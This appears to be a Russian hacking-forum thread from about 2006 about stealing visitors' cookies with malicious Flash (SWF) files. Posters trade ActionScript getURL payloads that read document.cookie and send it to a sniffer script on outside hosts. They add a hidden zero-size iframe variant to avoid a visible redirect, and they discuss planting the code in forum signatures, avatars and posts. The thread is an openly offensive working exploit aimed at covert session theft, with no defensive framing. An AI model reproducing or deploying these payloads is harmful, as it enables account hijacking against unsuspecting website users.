Вопрос поднимался. Но все равно я немного не понял суть... объясните плз. Как мона чтонить спереть через swf(даже те же самые куки, я немного просто не понял)? если допустим есть два сервера... сервер1 на нем сайт и swf выполняется без проверок, который качается с сервера 2...Сервер 2 - доступен...
флеш скрипты используются на стороне клиента как и джаваскрипты,суть состоит в том что можно из флеша сделать запрос к ввв страничке(как это делается например в ввв-казино всяких) а так же получить доступ к кукам,вот и все. RTFM ActionScript
Повторюсь RTFM ActionScript Хм,мои познания во флеше невелики но положимся на интуицию Сперва создаем переменную,присваивает значение getURL("javascript:alert(document.cookie)") (почитай как оттуда его выдрать т.е. описание функции гетурл) далее строчка что-то типа getURL("http://myserver.ru/s.php?la="+peremennaya) s.php соответственно обыкновенный скрипт - сниффер.Вопще вроде статьи есть на секлабе...
сниффер через флеш=) крута=) там где закачиваются флешки, раюотает эта штука x = getURL("javascript:alert(document.cookie)"); getURL("http://www.antichatsniff.ru/cgi/sniff.cgi?cookie="+x);
во, еще вопрос...эта штука работает тока на том сервере, где находится? то есть если она скачивается и показывается на www.mysite1.ru с www.mysite2.ru - куки берутся от сюда? с mysite2?
Непонял вопроса,вопщем опять по моим способностям телепатии интерпритирую твой вопрос: Куки будут браться с того сайта где флешка ПОКАЗЫВАЕТСЯ. Могу ошибаться,попробуй скажи,самому интересно...
странно... но когда я вызываю на сайте1 флешку которая лежит на втором сайте- пишет это- [Tue Aug 29 19:42:07 2006] IP=8*.16*.1*1.2*REFERER=http://a****h*e*a*ts.ru/index.php?pid=6 QUERY=cookie=undefined
ну так правильно,ты пытаешься присвоить переменной x значение алерта(из джавы) делай уж тогда javascript:document.cookie вот собственна,кстать появилась статья на эту тему скопипастил Mobile в наш форум(с секлаба) я нечитал т.к. неособо нужно мне,а тебе советую почитать и посмотреть что там пишут.
getURL("javascript:location.replace('http://www.mountainboard.ru/cgi/sniff.cgi?'+document.cookie)") я сделал так...но как возвращать ту же страницу в сниффере?() а то там открывается новая print "Location: ****";(или написать там $ref) Но тогда эта вся байда зациклица=()
как сделать чтоб не было редиректа, а то это слишком палевно. И кстати в Опере не работает, у кого какие идеи будут? ЗЫ Реаниматор - ящик у тебя забит
http://www.yandex.ru/yandsearch?text=ajax&stype=www вот еще способ обратиться по нужному адресу, работает в опере и ИЕ, в лисе не знаю. в отличие от img= new Image();........ не палится ослом: PHP: document.write('<iframe src="http://127.0.0.1/pixcb.php" id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>');
PHP: document.write('<iframe src="http://127.0.0.1/pixcb.php" id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>'); блин, сто лет с пхп не работал: Notice: Use of undefined constant document - assumed 'document' in z:\home\localhost\www\d\swf3.php on line 2 Fatal error: Call to undefined function: write() in z:\home\localhost\www\d\swf3.php on line 2 что оно от меня хочет? обьявить константу? как? и что-то я не понимаю как это мне заюзать
это не пшп код, это джава-скрипт код, а вставлен в тег пшп для удобства читабельности на форуме. просто вставляй как жс
блин, я сначала отрабатываю на локал файлах, а потом уже тестю на форуме, так что скажите просто как и что куда вставлять, я запутался уже. Речь шла о флешке, потом дали мне пхп код с явакспиртом внутри, теперь говорят вставляй это в Js ))) Я уже ничего не понимаю. Давайт по порядку 1) есть форум, в нем месаджи, моя подпись, аватар 2) есть код скрипта 3) есть снифер Значит я должен вставтить код 1) в подпись в чистом виде 2) вставить в пост в чистом виде 3) заныкать его в "коды" форума 4) присоеденить через уже известные коды при этом линк будет на удаленный Js файл
у тя был вопрос как сделать без редиректа и вообщ без палева отсылку куков на снифер, этот пример именно это и делает пользоваться так: код вставляешь в своем swf файле в getUrl("javascript: "); все вставлено в яваскриптовский document.write потомучто iframe это не js, а html
пробывал такое Code: getUrl('javascript:document.write(\'<iframe src="http://localhost/s/s.php?"+document.cookie id="lnk" width="0" height="0"></iframe><script>lnk.click()</script>\');'); и такое Code: getUrl('javascript:var cook; cook = document.cookie; document.write(\'<iframe src="http://localhost/s/s.php"\'+cook+\' id="lnk" width="0" height="0"></iframe>\');lnk.click();'); В обоих случаях чистый ивент в снифер, и пустая страничка темы куда это закинули, то есть редирект таки остался. Кто чем поможет? ЗЫ очень важно что кавычки в конце и начале одинарные, то есть getUrl('javascript
